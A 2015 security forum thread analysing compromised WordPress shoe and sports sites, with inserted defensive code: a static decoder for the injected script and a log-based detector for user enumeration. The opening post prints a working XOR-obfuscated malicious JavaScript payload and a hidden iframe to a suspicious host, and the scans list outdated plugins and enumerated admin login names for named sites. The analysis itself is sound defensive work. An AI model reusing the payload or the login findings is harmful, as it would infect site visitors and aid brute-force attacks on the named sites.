Author Topic: Site with elevated exposure or only blacklisted?  (Read 3826 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Site with elevated exposure or only blacklisted?
« on: October 09, 2015, 11:35:11 PM »
See: https://app.webinspector.com/public/reports/42166582?cache=true
See: https://sitecheck.sucuri.net/results/www.enginshoes.com
Hidden Iframes. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202?v04
<iframe src="htxp://googletraids.ml/46cx" width="1" height="1" frameborder="0">
*Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v282.2
    <script>var a="'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{x23016745:;'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02dmp'0:'02tcp'02k'1F2'1@'02k'02'1A'02ngl'1@'02k))'02'0;'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02vgzv'02)'1F'02ajcpqgv,ajcpCv'0:Ocvj,dnmmp'0:Ocvj,pclfmo'0:'0;'02('02ajcpqgv,nglevj'0;'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02pgvwpl'02vgzv'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'02'02'02'02qgvVkogmwv'0:32'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02qg]pgdgppgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:uklfmu,nmacvkml,jmqv'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02`cqg'02'1F'02'00k,knnwoklcvkmlgq,amo-hqlkvaj'00'1@'2C'02'02'02'02'02'02'02'02tcp'02wwkf'02'1F'02qvpkleEgl'0:7'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02l]wpn'02'1F'02'00jvvr'1C--'00'02)'02wwkf'02)'02'00,'00'02)'02`cqg'02)'02'00'1Dfgdcwnv]ig{umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'00'04qg]pgdgppgp'1F'00'02)'02qg]pgdgppgp'02)'02'00'04qmwpag'1F'00'02)'02jmqv'1@'2C'02'02'02'02'02'02'02'02kd'02'0:fgdcwnv]ig{umpf'02'03'1F'1F'02lwnn'02'04'04'02fgdcwnv]ig{umpf'02'03'1F'1F'02'05'05'02'04'04'02qg]pgdgppgp'02'03'1F'1F'02lwnn'02'04'04'02qg]pgdgppgp'02'03'1F'1F'02'05'05'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02fmawoglv,upkvg'0:'05'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script> redirect response error = 
IFrameinject.AE

Web application version:
WordPress version: WordPress 3.8.1
Wordpress Version 3.8.0 based on: -http://www.enginshoes.com/wp-admin/js/common.js
RevSlider version: 4.1.1
WordPress theme: -http://www.enginshoes.com/wp-content/themes/room09/
Wordpress internal path: /home/enginshoes.com/httpdocs/wp-content/themes/room09/index.php
WordPress version outdated: Upgrade required.
RevSlider Plugin outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2
Outdated RevSlider Found. Serious risk: Under 4.1.4

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress site's front page.

woocommerce 2.1.6   latest release (2.4.7) Update required
http://www.woothemes.com/woocommerce/
revslider   
yith-woocommerce-wishlist   latest release (2.0.11)
http://yithemes.com/themes/plugins/yith-woocommerce-wishlist/
yith-woocommerce-compare   latest release (2.0.4)
https://yithemes.com/
nextend-facebook-connect 1.4.59   latest release (1.5.7) Update required
http://nextendweb.com/
yith-woocommerce-ajax-navigation   latest release (2.4.0)
http://yithemes.com/

WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /

Room09 1.6.2 http://demo.yithemes.com/room09/

Warning User Enumeration is possible
The first two user IDs were tested to determine if user enumeration is possible.

ID   User   Login
1   None   murat
2      None

polonus (volunteer website security analyst and website error-hunter)
« Last Edit: October 09, 2015, 11:41:57 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
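The pasted script is a common wrapper: a string whose every character code has been XORed with 2, run through unescape(), and handed to document.write(). The following is an added example, written for this thread and not taken from polonus's post or from Sucuri; it reverses that wrapper statically (the decoded text is returned, never executed) and lists indicators a reviewer wants to see before deciding the site is compromised. It is checked against a short fragment copied from the start of the pasted payload (`'1Aqapkrv'1G`, which decodes to `<script>`) and against a constructed sample with a placeholder host.

```javascript
// Added example (not from the forum post): static decoder for the
// "XOR every char code with 2, then unescape(), then document.write()"
// wrapper seen in the pasted script. Nothing decoded is executed.

// Reverse the a.charCodeAt(i) ^ 2 step. XOR is its own inverse, so the
// same function also encodes.
function xorChars(str, key) {
  let out = '';
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode(str.charCodeAt(i) ^ key);
  }
  return out;
}

// Re-implementation of the legacy unescape(): %XX and %uXXXX sequences
// become characters, everything else passes through unchanged.
function legacyUnescape(str) {
  return str.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, h2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Full decode of the wrapper's payload string (the sample uses key 2).
function decodePayload(encoded, key = 2) {
  return legacyUnescape(xorChars(encoded, key));
}

// Encoder, used here only to build constructed test input: mimic the legacy
// escape() for ASCII (letters, digits and @*_+-./ pass, the rest becomes
// %XX), then XOR. Produces the same shape as the pasted payload.
function encodePayload(plain, key = 2) {
  let escaped = '';
  for (const ch of plain) {
    const code = ch.charCodeAt(0);
    if (/[A-Za-z0-9@*_+\-./]/.test(ch)) escaped += ch;
    else if (code < 256) escaped += '%' + code.toString(16).toUpperCase().padStart(2, '0');
    else escaped += '%u' + code.toString(16).toUpperCase().padStart(4, '0');
  }
  return xorChars(escaped, key);
}

// Indicators a reviewer wants from the decoded text: what it writes into
// the page, whether it reads referrer/host (typical of SEO/redirect
// injections), and which hosts it references.
function extractIndicators(decoded) {
  const indicators = [];
  if (/document\.write\s*\(/.test(decoded)) indicators.push('document.write');
  if (/<script/i.test(decoded)) indicators.push('script-tag');
  if (/<iframe/i.test(decoded)) indicators.push('iframe-tag');
  if (/location\.host|document\.referrer/.test(decoded)) indicators.push('reads-referrer-or-host');
  const hosts = [...decoded.matchAll(/https?:\/\/([A-Za-z0-9.-]+)/g)].map((m) => m[1]);
  return { indicators, hosts: [...new Set(hosts)] };
}

function analyze(encoded, key = 2) {
  const decoded = decodePayload(encoded, key);
  return { decoded, ...extractIndicators(decoded) };
}

// Fragment copied from the start of the pasted payload; decodes to "<script>".
const SAMPLE_FRAGMENT = "'1Aqapkrv'1G";

// Constructed sample in the same shape; example.invalid is a placeholder host.
const CONSTRUCTED_PLAIN =
  `<script>document.write('<iframe src="http://example.invalid/x" width="1" height="1"></iframe>');</script>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodePayload(SAMPLE_FRAGMENT));
  console.log(analyze(encodePayload(CONSTRUCTED_PLAIN)));
}
```

Run it with `node decode.js`; to analyse a real sample, pass the quoted value of `a` from the page source to `analyze()` and read the decoded text and host list rather than loading the page in a browser.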

Re: Site with elevated exposure or only blacklisted?
« Reply #1 on: October 09, 2015, 11:59:35 PM »
There are two causes for this:
Quote
One, is that your webserver (probably Apache) has write access to the core files. This happens a lot in shared hosting, where the Apache process runs as your user login. In general, this is a bad thing. Normally, you just want to give Apache write access to sites/default/files and your private and tmp directories (wherever they are defined).

Two, is that your hosting provider or your server is probably running an outdated version of PHP. Again, this tends to happen a lot with shared hosts (many are reluctant to keep up with latest security versions). Many outdated versions of PHP have security vulnerabilities in them, which lets attackers construct bad URLs and write to files on the filesystem. Adding code to template files is low hanging fruit that a lot of people don't notice.
Quote info credits go to: mpdonadio on Drupal groups.

polonus

Re: Site with elevated exposure or only blacklisted?
« Reply #2 on: October 12, 2015, 07:08:42 PM »
Update: https://www.virustotal.com/nl/url/24454096f28cc27c88f19301f84fdd8ac140f6ae2ae34b4b1969160cea9a77bb/analysis/1444668729/
plugins/system/rokbox/rokbox.js
Severity:   Potentially Suspicious
Reason:   Detected potentially suspicious content.
Details:   Detected potentially suspicious initialization of function pointer to JavaScript method write: __tmpvar1530976633 = write;
Threat dump:   See: https://sitecheck.sucuri.net/results/www.mmasport.it
Threat dump MD5:   A5EE45F9A5AD8053DA56CAB26EF21FC5
File size[byte]:   20280
File type:   ASCII
Page/File MD5:   2089714D3A3033069E28360505C233B4
Scan duration[sec]:   1.227000

Also see: https://forum.avast.com/index.php?topic=176205.0

polonus

Re: Site with elevated exposure or only blacklisted?
« Reply #3 on: October 15, 2015, 03:04:47 PM »
See: http://urlquery.net/report.php?id=1444913118917
Bitdefender TrafficLight flags.
Seems this malware is back (or has it ever been away?) -> Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v282.2
WordPress Version
4.0.8
Version does not appear to be latest 4.3.1 - update now.

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress site's front page.

custom-contact-forms 5.1.0.5   latest release (6.9.0) Update required
http://www.taylorlovett.com
vipers-video-quicktags   latest release (6.5.2)
http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /

Twenty Twelve 1.7 https://wordpress.org/themes/twentytwelve/

Warning User Enumeration is possible
The first two user IDs were tested to determine if user enumeration is possible.

ID   User   Login
1   None   admin
2   None   gerard
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring, as this will reduce the chance of automated password attackers gaining access. However, it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

On PHP version: https://forums.cpanel.net/threads/is-it-already-dangerous-keeping-php-5-2-17-on-production.267442/

polonus
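Both scan reports above say the first two user IDs could be enumerated, and the last one warns about brute force against the admin account. The probe behind that finding is a series of `?author=N` requests: with pretty permalinks enabled, WordPress redirects `?author=N` for an existing user to `/author/<login>/`, which is how scanners recover login names. The following added example (written for this thread, not from polonus's posts or from WPScan) is the detection side of that: it reads Apache combined-format log lines, groups them by client, flags clients that walk several author IDs, and counts their wp-login.php POSTs. The log lines are constructed and use documentation IP ranges; the user names in them are placeholders.

```javascript
// Added example (not from the thread): flag clients that walk WordPress
// user IDs via ?author=N and count their login POSTs, from access log lines.
// SAMPLE_LOG is constructed (Apache combined format, documentation IPs).
const SAMPLE_LOG = [
  '198.51.100.7 - - [15/Oct/2015:14:02:11 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [15/Oct/2015:14:02:12 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [15/Oct/2015:14:02:13 +0000] "GET /?author=3 HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [15/Oct/2015:14:03:40 +0000] "POST /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [15/Oct/2015:14:03:41 +0000] "POST /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [15/Oct/2015:14:05:02 +0000] "GET /author/someuser/ HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [15/Oct/2015:14:05:09 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"',
  'garbage line that does not parse',
];

// client, method, request target and status from a combined-format line.
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], method: m[2], target: m[3], status: Number(m[4]) };
}

// Numeric value of an author= query parameter, or null when absent.
function authorIdOf(target) {
  const q = target.indexOf('?');
  if (q < 0) return null;
  const m = /(?:^|&)author=(\d+)(?:&|$)/.exec(target.slice(q + 1));
  return m ? Number(m[1]) : null;
}

// Returns one finding per client that requested at least minDistinctIds
// different author IDs. confirmedUsers counts the 301/302 answers, i.e.
// IDs that WordPress acknowledged as existing users.
function detectEnumeration(lines, minDistinctIds = 2) {
  const perIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue; // unparseable lines are skipped, not fatal
    const s = perIp.get(r.ip) || { authorIds: new Set(), confirmed: 0, loginPosts: 0 };
    const id = authorIdOf(r.target);
    if (r.method === 'GET' && id !== null) {
      s.authorIds.add(id);
      if (r.status === 301 || r.status === 302) s.confirmed++;
    }
    if (r.method === 'POST' && r.target.startsWith('/wp-login.php')) s.loginPosts++;
    perIp.set(r.ip, s);
  }
  const findings = [];
  for (const [ip, s] of perIp) {
    if (s.authorIds.size >= minDistinctIds) {
      findings.push({
        ip,
        authorIds: [...s.authorIds].sort((a, b) => a - b),
        confirmedUsers: s.confirmed,
        loginPosts: s.loginPosts,
      });
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(detectEnumeration(SAMPLE_LOG));
}
```

On the sample, 198.51.100.7 is reported with IDs 1 to 3, two confirmed users and two login POSTs, while 203.0.113.9 (one author page and a single `?author=1`) is not. Feed real logs in line by line and raise `minDistinctIds` if your own monitoring legitimately touches author URLs.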